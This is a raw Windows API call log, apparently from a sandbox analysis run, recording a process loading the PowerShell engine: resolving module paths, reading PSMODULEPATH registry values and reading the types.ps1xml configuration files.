	[0328.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0328.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0328.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0328.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0328.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0328.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0328.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0328.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0328.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0328.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0328.430] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0328.430] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0328.430] CoTaskMemFree (pv=0xffff0) 
	[0328.884] CoTaskMemAlloc (cb=0xcc) returned 0x17dc10
	[0328.884] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x17dc10, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0328.884] CoTaskMemFree (pv=0x17dc10) 
	[0328.884] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d548 | out: phkResult=0x26d548*=0x320) returned 0x0
	[0328.884] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x26d4cc, lpData=0x0, lpcbData=0x26d4c8*=0x0 | out: lpType=0x26d4cc*=0x2, lpData=0x0, lpcbData=0x26d4c8*=0x6c) returned 0x0
	[0328.885] CoTaskMemAlloc (cb=0x70) returned 0x11a330
	[0328.885] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x26d49c, lpData=0x11a330, lpcbData=0x26d498*=0x6c | out: lpType=0x26d49c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x26d498*=0x6c) returned 0x0
	[0328.885] CoTaskMemFree (pv=0x11a330) 
	[0328.885] CoTaskMemAlloc (cb=0xcc) returned 0x17dc10
	[0328.885] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x17dc10, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0328.885] CoTaskMemFree (pv=0x17dc10) 
	[0328.885] CoTaskMemAlloc (cb=0xcc) returned 0x17dc10
	[0328.885] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x17dc10, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0328.885] CoTaskMemFree (pv=0x17dc10) 
	[0328.887] RegCloseKey (hKey=0x320) returned 0x0
	[0328.887] CoTaskMemAlloc (cb=0xcc) returned 0x17dc10
	[0328.887] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x17dc10, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0328.887] CoTaskMemFree (pv=0x17dc10) 
	[0328.887] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d548 | out: phkResult=0x26d548*=0x320) returned 0x0
	[0328.887] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x26d4cc, lpData=0x0, lpcbData=0x26d4c8*=0x0 | out: lpType=0x26d4cc*=0x0, lpData=0x0, lpcbData=0x26d4c8*=0x0) returned 0x2
	[0328.887] RegCloseKey (hKey=0x320) returned 0x0
	[0328.892] CoTaskMemAlloc (cb=0x20c) returned 0x167730
	[0328.892] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x167730 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0328.893] CoTaskMemFree (pv=0x167730) 
	[0328.893] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x26d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0328.894] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0328.895] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0328.895] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0328.895] CoTaskMemFree (pv=0xffff0) 
	[0328.895] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0328.895] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0328.896] CoTaskMemFree (pv=0xffff0) 
	[0328.898] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0328.898] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0328.898] CoTaskMemFree (pv=0xffff0) 
	[0328.898] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0328.898] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0328.898] CoTaskMemFree (pv=0xffff0) 
	[0328.901] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d338 | out: phkResult=0x26d338*=0x328) returned 0x0
	[0328.902] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x26d34c, lpData=0x0, lpcbData=0x26d348*=0x0 | out: lpType=0x26d34c*=0x1, lpData=0x0, lpcbData=0x26d348*=0x74) returned 0x0
	[0328.902] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x26d2bc, lpData=0x0, lpcbData=0x26d2b8*=0x0 | out: lpType=0x26d2bc*=0x1, lpData=0x0, lpcbData=0x26d2b8*=0x74) returned 0x0
	[0328.902] CoTaskMemAlloc (cb=0x78) returned 0x11a330
	[0328.903] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x26d28c, lpData=0x11a330, lpcbData=0x26d288*=0x74 | out: lpType=0x26d28c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x26d288*=0x74) returned 0x0
	[0328.903] CoTaskMemFree (pv=0x11a330) 
	[0328.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x26d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0328.903] SetErrorMode (uMode=0x1) returned 0x1
	[0328.903] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x26d210 | out: lpFileInformation=0x26d210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0328.903] SetErrorMode (uMode=0x1) returned 0x1
	[0328.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0328.906] SetErrorMode (uMode=0x1) returned 0x1
	[0328.906] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d210 | out: lpFileInformation=0x26d210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0328.906] SetErrorMode (uMode=0x1) returned 0x1
	[0328.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0328.910] SetErrorMode (uMode=0x1) returned 0x1
	[0328.910] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d210 | out: lpFileInformation=0x26d210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0328.911] SetErrorMode (uMode=0x1) returned 0x1
	[0328.911] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0328.911] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0328.911] CoTaskMemFree (pv=0xffff0) 
	[0328.914] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0328.914] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0328.914] CoTaskMemFree (pv=0xffff0) 
	[0328.914] GetACP () returned 0x4e4
	[0328.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0328.922] SetErrorMode (uMode=0x1) returned 0x1
	[0328.923] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0328.923] GetFileType (hFile=0x32c) returned 0x1
	[0328.923] SetErrorMode (uMode=0x1) returned 0x1
	[0328.924] GetFileType (hFile=0x32c) returned 0x1
	[0328.925] ReadFile (in: hFile=0x32c, lpBuffer=0x2ea5660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2ea5660*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0328.927] ReadFile (in: hFile=0x32c, lpBuffer=0x2ea5660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2ea5660*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0328.927] ReadFile (in: hFile=0x32c, lpBuffer=0x2ea5660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2ea5660*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0328.928] ReadFile (in: hFile=0x32c, lpBuffer=0x2ea5660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2ea5660*, lpNumberOfBytesRead=0x26d148*=0xcf3, lpOverlapped=0x0) returned 1
	[0328.928] ReadFile (in: hFile=0x32c, lpBuffer=0x2ea4abb, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2ea4abb*, lpNumberOfBytesRead=0x26d148*=0x0, lpOverlapped=0x0) returned 1
	[0328.928] ReadFile (in: hFile=0x32c, lpBuffer=0x2ea5660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2ea5660*, lpNumberOfBytesRead=0x26d148*=0x0, lpOverlapped=0x0) returned 1
	[0329.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0329.493] SetErrorMode (uMode=0x1) returned 0x1
	[0329.493] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d0c0 | out: lpFileInformation=0x26d0c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0329.493] SetErrorMode (uMode=0x1) returned 0x1
	[0329.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0329.494] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d1a8 | out: phkResult=0x26d1a8*=0x32c) returned 0x0
	[0329.494] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d12c, lpData=0x0, lpcbData=0x26d128*=0x0 | out: lpType=0x26d12c*=0x1, lpData=0x0, lpcbData=0x26d128*=0x56) returned 0x0
	[0329.494] CoTaskMemAlloc (cb=0x5a) returned 0x1851a0
	[0329.494] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d0fc, lpData=0x1851a0, lpcbData=0x26d0f8*=0x56 | out: lpType=0x26d0fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d0f8*=0x56) returned 0x0
	[0329.494] CoTaskMemFree (pv=0x1851a0) 
	[0329.494] RegCloseKey (hKey=0x32c) returned 0x0
	[0329.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0329.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0329.525] GetSystemInfo (in: lpSystemInfo=0x26bde0 | out: lpSystemInfo=0x26bde0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0329.526] VirtualQuery (in: lpAddress=0x26be90, lpBuffer=0x26cd50, dwLength=0x30 | out: lpBuffer=0x26cd50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0330.106] SetErrorMode (uMode=0x1) returned 0x1
	[0330.106] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0330.106] GetFileType (hFile=0x32c) returned 0x1
	[0330.107] SetErrorMode (uMode=0x1) returned 0x1
	[0330.107] GetFileType (hFile=0x32c) returned 0x1
	[0330.107] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.108] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.108] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.108] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.108] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.108] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.109] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.109] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.109] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.110] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.110] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.111] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.111] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.111] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.111] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.112] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.112] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.113] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.114] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.114] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.114] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
	[0330.115] ReadFile (in: hFile=0x32c, lpBuffer=0x2da0ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d148, lpOverlapped=0x0 | out: lpBuffer=0x2da0ed0*, lpNumberOfBytesRead=0x26d148*=0x1000, lpOverlapped=0x0) returned 1
